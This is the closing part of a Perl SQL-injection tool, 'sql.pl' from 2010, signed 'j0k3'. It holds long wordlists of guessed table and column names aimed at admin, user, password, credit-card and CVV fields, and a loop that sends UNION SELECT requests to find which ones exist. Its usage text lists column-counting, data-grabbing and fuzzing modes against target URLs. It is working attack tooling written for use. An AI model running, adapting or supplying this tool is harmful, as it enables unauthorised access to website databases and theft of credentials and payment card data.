'sysusers','table','tables','tb_admin','tb_adminis trator','tb_login','tb_member',
'tb_members','tb_user','tb_username','tb_usernames ','tb_users','tbl','tbl_user',
'tbl_users','tbluser','tbl_clients','tbl_client',' tblclients','tblclient','test',
'usebb_members','user_admin','user_info','user_lis t','user_login','user_logins',
'user_names','usercontrol','userinfo','userlist',' userlogins','username','usernames',
'userrights','users','vb_user','vbulletin_session' ,'vbulletin_user','voodoo_members',
'webadmin','webadmins','webmaster','webmasters','w ebuser','webusers','x_admin',
'xoops_bannerclient','xoops_users','yabb_settings' ,'yabbse_settings','ActiveDataFeed',
'Category','CategoryGroup','ChicksPass','ClickTrac k','Country','CountryCodes1',
'DataFeedShowtag1','DataFeedShowtag2','DataFeedSho wtag2_incoming','dtproperties',
'Event','Event_backup','Event_Category','EventRedi rect','Events_new','Genre',
'JamPass','MyTicketek','MyTicketekArchive','News', 'Promotion','Region',
'SearchOptions','Series','Sheldonshows','StateList ','States','SubCategory',
'Subjects','Survey','SurveyAnswer','SurveyAnswerOp en','SurveyQuestion','SurveyRespondent',
'sysconstraints','syssegments','tblRestrictedPassw ords','tblRestrictedShows',
'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
'uvw_Category','uvw_Preferences','Venue','venues', 'VenuesNew','stone list',
'tblArtistCategory','tblArtists','tblConfigs','tbl Layouts','tblLogBookAuthor',
'tblLogBookImages','tblLogBookImport','tblLogBookU ser','tblMails','tblNewCategory',
'tblNews','tblOrders','tblStoneCategory','tblStone s','tblUser','tblWishList',
'viewLogBookEntry','viewStoneArtist','vwListAllAva ilable','CC_info',
'CC_username','cms_user','cms_users','cms_admin',' cms_admins','user_name',
'jos_user','table_user','email','mail','bulletin', 'cc_info','login_name',
'admuserinfo','userlistuser_list','SiteLogin','Sit e_Login','UserAdmin',
);
# Column wordlist; same paste damage ('pass ', 'custom ers_email_address',
# 'cvvnumber]', ...).
my @columns = (
'user','name','username','password','passwd','pass ','benutzername','passwort',
'cc_number','id','email','pwd','user_name','custom ers_email_address',
'customers_password','user_password','user_pass',' admin_user','admin_password',
'admin_pass','usern','user_n','username1','passwor d1','email1','id1',
'users','login','logins','login_user','login_admin ','login_username','user_username',
'user_login','auid','apwd','adminid','admin_id','a dminuser','adminuserid',
'admin_userid','adminusername','admin_username','a dminname','admin_name',
'usr','usr_n','usrname','usr_name','usrpass','usr_ pass','usrnam','nc','uid',
'userid','user_id','myusername','mail','emni','log ohu','punonjes','kpro_user',
'wp_users','emniplote','perdoruesi','perdorimi','p unetoret','logini','llogaria',
'kodi','emer','ime','korisnik','korisnici','user1' ,'administrator','text',
'administrator_name','mem_login','login_password', 'login_pass','login_passwd',
'login_pwd','sifra','lozinka','psw','pass1word','p ass_word','passw','pass_w',
'user_passwd','userpass','userpassword','userpwd', 'user_pwd','useradmin',
'user_admin','mypassword','passwrd','admin_pwd','a dmin_passwd','mem_password',
'memlogin','e_mail','usrn','u_name','uname','mempa ssword','mem_pass',
'mem_passwd','mem_pwd','p_word','pword','p_assword ','myname','my_username',
'my_name','my_password','my_email','cvvnumber','ab out','access','accnt',
'accnts','account','accounts','admin','adminemail' ,'adminlogin','adminmail',
'admins','aid','aim','auth','authenticate','authen tication','blog','cc_expires',
'cc_owner','cc_type','cfg','cid','clientname','cli entpassword','clientusername',
'conf','config','contact','converge_pass_hash','co nverge_pass_salt','crack',
'customer','customers','cvvnumber]','data','db_database_name','db_hostname',
'db_password','db_username','download','e-mail','emailaddress','full','gid',
'group','group_name','hash','hashsalt','homepage', 'icq','icq_number','id_group',
'id_member','images','index','ip_address','last_ip ','last_login','lastname',
'log','login_name','login_pw','loginkey','loginout ','logo','md5hash','member',
'member_id','member_login_key','member_name','memb erid','membername','members',
'new','news','nick','number','nummer','pass_hash', 'passwordsalt','passwort',
'personal_key','phone','privacy','pw','pwrd','salt ','search','secretanswer',
'secretquestion','serial','session_member_id','ses sion_member_login_key','sesskey',
'setting','sid','spacer','status','store','store1' ,'store2','store3','store4',
'table_prefix','temp_pass','temp_password','temppa ss','temppasword','text','un',
'user_email','user_icq','user_ip','user_level','us er_passw','user_pw','user_pword',
'user_pwrd','user_un','user_uname','user_usernm',' user_usernun','user_usrnm',
'userip','userlogin','usernm','userpw','usr2','usr nm','usrs','warez','xar_name',
'xar_pass');
print "\nUrl: $url\n"; writing("\nUrl: $url\n");
print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
# One GET per table, plus one per column for each table that matches.
# No 'or die' here and the HTTP status is never looked at, only the body;
# nothing stops the loop on transport errors.
foreach my $tab (@tables) {
# 9x5 is string repetition: the literal "99999".
my $re = replace($url,'j0k3',9x5);
my $resp = $ua->get("$re+FROM+$tab--+");
# [^,] before the marker: presumably so the ",99999" that is just the
# request URL echoed back into the page does not count - TODO confirm.
if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) {
print "+ $tab -> Scanning Columns:\n";
writing("+ $tab -> Scanning Columns:\n");
foreach my $col (@columns) {
$re = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
$resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+");
# Same idea with [^(]: the marker inside the echoed "CONCAT(99999,..."
# is excluded - TODO confirm.
if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
print "- $col\n"; writing("- $col\n");
}
}
}
}
}
sub replace {
    # Return a copy of the subject string in which the first match of the
    # pattern (treated as a regex, not a literal) is replaced by the given
    # replacement text. The caller's variable is never modified.
    my ($subject, $pattern, $replacement) = @_;
    my $result = $subject;
    $result =~ s/$pattern/$replacement/;
    return $result;
}
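sub writing {
    # Append $text to the log file named by the package global $file.
    #
    # Three-argument open with a lexical handle: the mode is fixed to '>>'
    # and cannot be altered by whatever $file contains, and the handle does
    # not leak into the global namespace. close() is checked because errors
    # from buffered writes only surface there.
    my $text = shift;
    open my $fh, '>>', $file or die "\n$!\n";
    print {$fh} $text;
    close $fh or die "\n$!\n";
    return;
}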
sub error {
    # Print a framed pointer to the usage text and terminate. The heredoc is
    # single-quoted so the '$' in the hint is literal.
    print <<'END_ERROR';
+-------------------------------------------------------------+
| Error: Read Usage! - $ perl sql.pl |
+-------------------------------------------------------------+
END_ERROR
    exit;
}
sub usage {
    # Print the framed usage text (leading blank line included, no
    # interpolation: the '$' signs are literal) and terminate.
    print <<'END_USAGE';

+-------------------------------------------------------------+
| INFORMATION |
+-------------------------------------------------------------+
| |
| Column Counter: |
| $ perl sql.pl -c <url> <true-word> |
| $ perl sql.pl -c http://seite.de/?id=7 j0k3 |
| |
| SQL Data Grabber: |
| $ perl sql.pl -d <url> |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, |
| j0ke(column1,column2)+from+table |
| |
| Name Information Fuzzer: |
| $perl sql.pl -f <url> |
| $perl sql.pl -f http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| |
| < j0k3 > |
+-------------------------------------------------------------+
END_USAGE
    exit;
}
# EOF - < j0k3 > - > 06.2010 - version 1.0